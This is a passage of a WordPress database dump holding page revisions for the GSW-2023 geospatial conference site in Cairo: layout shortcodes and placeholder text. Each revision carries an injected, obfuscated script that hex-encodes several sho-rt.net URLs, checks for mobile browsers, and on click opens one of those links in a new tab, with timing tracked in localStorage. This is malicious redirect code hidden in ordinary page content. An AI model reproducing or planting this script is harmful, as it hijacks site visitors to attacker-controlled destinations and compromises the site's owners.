ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:10:28','2022-11-08 22:10:28','',3066,'https://gsw2023.com/?p=3091',0,'revision','',0),
(3092,1,'2022-11-08 22:12:22','2022-11-08 22:12:22','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item][/ultimate_icon_list_item][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:12:22','2022-11-08 22:12:22','',3066,'https://gsw2023.com/?p=3092',0,'revision','',0),
(3093,1,'2022-11-08 22:19:14','2022-11-08 22:19:14','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#1e73be\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]aaaaaaaaaaaaa\r\n\r\naaaaaaaaaaaa\r\n\r\n[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 